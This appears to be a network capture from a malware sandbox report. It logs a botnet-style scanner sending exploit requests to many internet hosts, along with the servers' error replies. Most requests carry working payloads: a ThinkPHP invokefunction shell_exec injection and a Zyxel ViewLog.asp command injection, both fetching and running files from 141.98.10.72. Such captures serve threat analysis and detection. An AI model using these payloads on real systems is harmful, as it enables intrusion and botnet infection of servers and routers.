                                                        Server: kngx/1.10.2
                                                        Date: Wed, 14 Feb 2024 08:34:02 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 172
                                                        Connection: close
                                                        KS-Deny-Reason: client|81.181.57.74|cdnhncm48-cache26.cdnhncm48.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                        x-link-via: hncm48:80;
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        513192.168.2.1442838112.74.58.16180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.751507044 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:04.614680052 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:06.950681925 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:07.320192099 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:07 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        514192.168.2.1443400112.29.212.1980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.851552963 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:03.211159945 CET477INHTTP/1.1 400 Bad Request
                                                        Server: kngx/1.10.2
                                                        Date: Wed, 14 Feb 2024 08:34:03 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 172
                                                        Connection: close
                                                        KS-Deny-Reason: client|81.181.57.74|cdnhncm48-cache26.cdnhncm48.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                        x-link-via: hncm48:80;
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        515192.168.2.1456666112.81.87.21280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.993318081 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:03.317538977 CET956INHTTP/1.1 400 Bad Request
                                                        Server: Tengine
                                                        Date: Wed, 14 Feb 2024 08:34:03 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 809
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 6d 65 72 67 65 34 2e 6c 32 63 6e 33 30 32 32 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 34 2f 30 32 2f 31 34 20 31 36 3a 33 34 3a 30 33 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body bgcolor="white"><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand. Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http:///index.php?s=/index/hinkpp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'</td></tr><tr><td>Server:</td><td>merge4.l2cn3022</td></tr><tr><td>Date:</td><td>2024/02/14 16:34:03</td></tr></table><hr/>Powered by Tengine</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        516192.168.2.1443408112.29.212.1980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:03.059701920 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:03.431610107 CET477INHTTP/1.1 400 Bad Request
                                                        Server: kngx/1.10.2
                                                        Date: Wed, 14 Feb 2024 08:34:03 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 172
                                                        Connection: close
                                                        KS-Deny-Reason: client|81.181.57.74|cdnhncm48-cache26.cdnhncm48.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                        x-link-via: hncm48:80;
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        517192.168.2.145924488.221.87.15780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:03.423926115 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:03.618732929 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:03 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:03 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 64 35 37 64 64 35 38 26 23 34 36 3b 31 37 30 37 38 39 39 36 34 33 26 23 34 36 3b 31 33 32 35 34 36 63 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;9d57dd58&#46;1707899643&#46;132546c9</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        518192.168.2.144241431.200.105.1278080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:04.383601904 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        519192.168.2.143294231.128.204.548080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:04.386415005 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        520192.168.2.145299231.12.75.2378080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:04.501041889 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        521192.168.2.144859831.200.52.998080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:04.631351948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        522192.168.2.143997062.215.220.2358080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:04.803828955 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:05.107193947 CET596INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 19:25:12 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-UA-Compatible: IE=edge;IE=11;IE=10;IE=9
                                                        Content-Length: 348
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        523192.168.2.144936294.131.9.1388080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:05.298768044 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        524192.168.2.143800231.136.124.1468080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:05.309884071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:05.926630974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:07.174529076 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:09.766410112 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:14.886286974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:24.869865894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:45.348989010 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
